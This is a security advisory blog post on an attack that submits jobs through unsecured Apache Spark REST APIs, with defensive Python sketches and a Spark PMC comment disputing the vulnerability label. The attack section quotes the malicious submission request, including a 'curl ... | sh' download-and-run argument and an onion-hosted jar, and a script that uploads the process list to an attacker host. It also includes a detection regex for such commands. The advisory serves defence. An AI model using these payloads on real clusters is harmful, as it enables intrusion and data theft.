Alibaba Cloud Security Team Discovers Apache Spark Rest API Remote Code Execution (RCE) Exploit

This article describes the discovery, by Fengwei Zhang and the team at Alibaba Cloud Security on July 7, 2018, of the first "in-the-wild" Spark REST API Remote Code Execution (RCE) vulnerability.

By Fengwei Zhang

More companies today realize that they hold valuable data that can be turned into business insights. Hadoop paved the way to inexpensive centralization of data processing and democratized the building of large data repositories. Spark followed by enabling companies to build distributed processing and querying machinery more effectively than on Hadoop. Remote administration and maintenance of big data clusters, coupled with insufficient protection, has created a rush by attackers to find and exploit vulnerabilities in these big data platform technologies.

The Alibaba Cloud Security Team discovered the Hadoop Yarn RCE vulnerability on April 30, and now it is Apache Spark's turn, with a new vulnerability discovered by our cloud security team on July 7.

Gaining access to large repositories of data could be the next preferred vector of cyber-attacks, because it can be monetized in a variety of ways: from direct use of computational power to mine digital coins to full-scale theft of sensitive data, which is typically available unobfuscated to Spark jobs. While losing computational power may affect internal data processing, a backdoor to private data may present an even larger danger for unsuspecting enterprises.

Three important observations can be made. First, it is critically important to follow best practices when setting up infrastructure accessible from the outside. Second, your cloud provider should be a source of security strength. Having an experienced security team that proactively discovers vulnerabilities, recommends remediation steps for customers, and takes cloud-wide mitigation action should be an important factor when deciding which cloud to deploy your big data infrastructure to. Finally, I would encourage you to consider a serverless model for big data processing, where the infrastructure and its security are managed by your cloud provider.

Yuriy Yuzifovich,
Head of Security Innovation Labs (S.I.L.) at Alibaba Cloud

On July 7, 2018, the Alibaba Cloud Security Team discovered and performed an in-depth analysis of the first Remote Code Execution (RCE) exploit in the Spark REST API. In response to this threat, the team deployed several defense mechanisms against this attack on the Alibaba Cloud platform on July 9, preventing mass exploitation of this vulnerability.

Alibaba Cloud Security observed this new attack while it was apparently still in a small-scale testing phase. However, a large-scale outbreak may follow at any time in unprotected environments. While we implemented cloud-wide measures to prevent exploitation at Alibaba Cloud, we strongly recommend that every organization running Spark, both in our cloud and especially in other environments, take immediate action to prevent attackers from exploiting this vulnerability. We outline our remediation recommendations at the end of this post.

Impact of the Exploit

Apache Spark is a fast and versatile open-source cluster-computing framework, originally developed at AMPLab at the University of California, Berkeley. It is designed for large-scale data processing, and many companies moved from aging Hadoop MapReduce to Spark for their big data needs. Apache Spark also provides a web user interface and corresponding REST APIs in order to let users control tasks and view results conveniently.

As many companies rely on their Spark servers for analytics and big data processing, compromising a Spark server may expose sensitive data assets, with potential damage going far beyond the loss of computing resources to coin mining. Intentional data corruption, even on a single machine, can lead to the collapse of an entire Spark-based distributed cluster.

Improper configuration of Spark permissions may allow attackers to create, delete, and view jobs without authorization, potentially leading to full remote code execution.

Details of the Exploit

Let's take a closer look at the attacker's operations:

  1. Through mass scanning, the attacker discovers a Spark server whose web UI service is exposed to the internet.
  2. The attacker sends the following request to the Spark server's REST API on port 6066. The payload instructs the server to download SimpleApp.jar from a dark web location through the onion.plus gateway, so that the source of the subsequent stages stays hidden behind .onion proxy routing.
    POST /v1/submissions/create
    {
      "action": "CreateSubmissionRequest",
      "clientSparkVersion": "2.1.0",
      "appArgs": [ "curl x.x.x.x/y.sh|sh" ],
      "appResource": "https://xxxx.onion.plus/SimpleApp.jar",
      "environmentVariables": { "SPARK_ENV_LOADED": "1" },
      "mainClass": "SimpleApp",
      "sparkProperties": {
        "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "SimpleApp",
        "spark.eventLog.enabled": "false",
        "spark.submit.deployMode": "cluster",
        "spark.master": "spark://x.x.x.x:6066"
      }
    }

    Note that this is the first time we have seen the Tor "dark web" used to spread this type of backdoor. Security experts at Alibaba expect this approach to become more common in the near future. We estimate that about 5,000 Spark servers accessible on the web could be exploited using this vulnerability.

  3. Reverse engineering analysis shows that the jar package is a backdoor program that downloads a shell script through onion routing and then executes it.


  4. The content of the shell script is as follows:
    ps ax --sort=-pcpu > /tmp/tmp.txt
    curl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.php
    rm -rf /tmp/tmp.txt

    This script only collects the victim machine's process list, sorted by CPU usage, and uploads it, without taking any further action. It apparently gives the attackers on-the-ground intelligence about the estimated computing power of a cluster, which they can use to plan their next steps.
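The request shown in step 2 carries several indicators that a defender could look for in captured traffic or proxy logs. The following is a minimal sketch, not a production detector: the function name `suspicious_indicators`, the suffix list, and the regular expression are all assumptions made for illustration, and a real deployment would need a broader rule set.

```python
import json
import re
from urllib.parse import urlparse

# Hypothetical indicator lists, chosen to match the payload described above.
TOR_GATEWAY_SUFFIXES = (".onion", ".onion.plus")
# Matches a "download and pipe into a shell" command such as "curl host/y.sh|sh".
SHELL_PIPE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def suspicious_indicators(body: str) -> list:
    """Return the reasons a CreateSubmissionRequest body looks malicious."""
    try:
        request = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(request, dict):
        return []
    if request.get("action") != "CreateSubmissionRequest":
        return []

    props = request.get("sparkProperties")
    if not isinstance(props, dict):
        props = {}

    reasons = []
    # Jars can be named in appResource and in the comma-separated spark.jars list.
    jar_urls = [str(request.get("appResource") or "")]
    jar_urls += str(props.get("spark.jars") or "").split(",")
    for url in jar_urls:
        host = urlparse(url.strip()).hostname or ""
        if host.endswith(TOR_GATEWAY_SUFFIXES):
            reasons.append("jar fetched through a Tor gateway: " + host)

    for arg in request.get("appArgs") or []:
        if SHELL_PIPE.search(str(arg)):
            reasons.append("download-and-run command in appArgs: " + str(arg))
    return reasons
```

Passing the JSON body of a captured `POST /v1/submissions/create` request to `suspicious_indicators` returns a list of findings, or an empty list if none of these particular indicators is present. An empty result does not mean the submission is benign.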

Further Discussions

We estimate that more than 5,000 Spark servers with port 8080 exposed to the Internet are currently vulnerable to this attack. Some of them could be taken over to create a powerful distributed computational network, or to collect private data.

This is not the first time the Alibaba Cloud Security Team has discovered a vulnerability related to distributed computing systems. We previously published a report on the Hadoop Yarn vulnerability, which has many similarities with this new Spark attack.

With the continuing, rapid growth of the cryptocurrency economy, distributed systems with strong computing power but weak security capabilities will face more exploits by hackers.

Since its discovery, the Hadoop Yarn RCE vulnerability has become one of the preferred methods of malicious bitcoin mining. Extrapolating to the Spark REST API RCE vulnerability, we believe that it will be exploited for mining and other malicious uses very soon.

Suggestions for Remediation of Vulnerability

We suggest updating iptables rules or Security Groups with an access policy that restricts access to ports 8080, 8081, 8088, 7077, and 6066. An even better solution is not to expose these ports to the wider internet at all unless absolutely necessary.
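After tightening the firewall rules, it helps to confirm from a machine outside your network that the ports are no longer reachable. The sketch below does this with plain TCP connection attempts. The port-to-service mapping reflects the usual Spark standalone defaults and is an assumption about your deployment, and the helper names are hypothetical. Only run it against hosts you operate.

```python
import socket

# Usual Spark standalone defaults (an assumption; adjust if your cluster
# uses custom ports).
DEFAULT_SPARK_PORTS = {
    6066: "REST submission server",
    7077: "standalone master",
    8080: "master web UI",
    8081: "worker web UI",
}


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


def exposed_ports(host: str, ports=None) -> dict:
    """Return the subset of ports (with their labels) that accept connections."""
    if ports is None:
        ports = DEFAULT_SPARK_PORTS
    return {port: name for port, name in ports.items() if is_port_open(host, port)}
```

Calling `exposed_ports` with the public address of a Spark host should return an empty dictionary once the access policy is in place. A successful connection only shows that something is listening on that port, not that it is Spark.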

We also strongly suggest running Spark on YARN and enabling HTTP Kerberos access control for the web UI. If you are using Spark in standalone mode, you need to build a jar containing a servlet filter for access control and set spark.ui.filters accordingly.
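One way to keep these settings from drifting is to audit the cluster's spark-defaults.conf automatically. The following sketch parses the file's text and reports security-related properties that are missing or disabled. The properties it checks (`spark.authenticate`, `spark.acls.enable`, `spark.ui.filters`, `spark.master.rest.enabled`) are real Spark configuration keys, but the choice of checks, the function names, and the filter class name in the usage note are assumptions for illustration, not an official checklist.

```python
import re


def parse_spark_conf(text: str) -> dict:
    """Parse spark-defaults.conf style text into a dict of key -> value."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Keys and values may be separated by whitespace or by "=".
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            conf[parts[0]] = parts[1].strip()
    return conf


def audit_spark_conf(conf: dict) -> list:
    """Return human-readable findings for weak security settings."""
    findings = []
    if conf.get("spark.authenticate", "false").lower() != "true":
        findings.append("spark.authenticate is not enabled")
    if conf.get("spark.acls.enable", "false").lower() != "true":
        findings.append("spark.acls.enable is not enabled")
    if not conf.get("spark.ui.filters"):
        findings.append("spark.ui.filters is not set")
    # The default for this key differs between Spark versions, so only an
    # explicit "true" is flagged here.
    if conf.get("spark.master.rest.enabled", "").lower() == "true":
        findings.append("spark.master.rest.enabled is explicitly true")
    return findings
```

For example, a file that contains `spark.authenticate true`, `spark.acls.enable true`, and `spark.ui.filters com.example.AuthFilter` (a hypothetical filter class) produces no findings, while an empty file produces three.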

Further Reading

  1. Apache Spark Security Configuration: http://spark.apache.org/docs/latest/configuration.html#security
  2. Hadoop Yarn RCE Vulnerability: (Article in Chinese) https://www.toutiao.com/i6552678121449980423


srowen August 1, 2018 at 12:20 pm

I am posting on behalf of the Apache Spark PMC. This is not considered a security vulnerability and should not be advertised as such. This simply says that if one runs an inherently private service (Spark standalone master), but without enabling any ACLs or network security to block public access to it, that it can be accessed publicly. Of course it can.

There is in general no expectation that a Spark cluster is publicly accessible. (The standalone master is also intended for 'simple' usage, and secure environments typically use another resource manager with its own security mechanisms.) Undoubtedly, someone somewhere has left one running on the public internet. However, these are not software problems, but unreasonably poor choices from individual deployments.

The remedy is indeed to not provide public access to these services, or otherwise adopt other Spark resource managers with more elaborate security integrations. We can improve documentation to make this very clear.

However, this should not be described as a security vulnerability. It suggests there will be a CVE and that a software patch is required. It isn't. Normal network security practices, and other Spark resource manager mechanisms, provide security to prevent this.

Of course, we would not normally post about this in public. I do so because this blog was posted publicly at the same time it was raised with the Apache Spark PMC. If it were a vulnerability requiring a fix, this disclosure would be considered highly irresponsible. We encourage anyone reporting a vulnerability to follow the standard protocol at https://apache.org/security/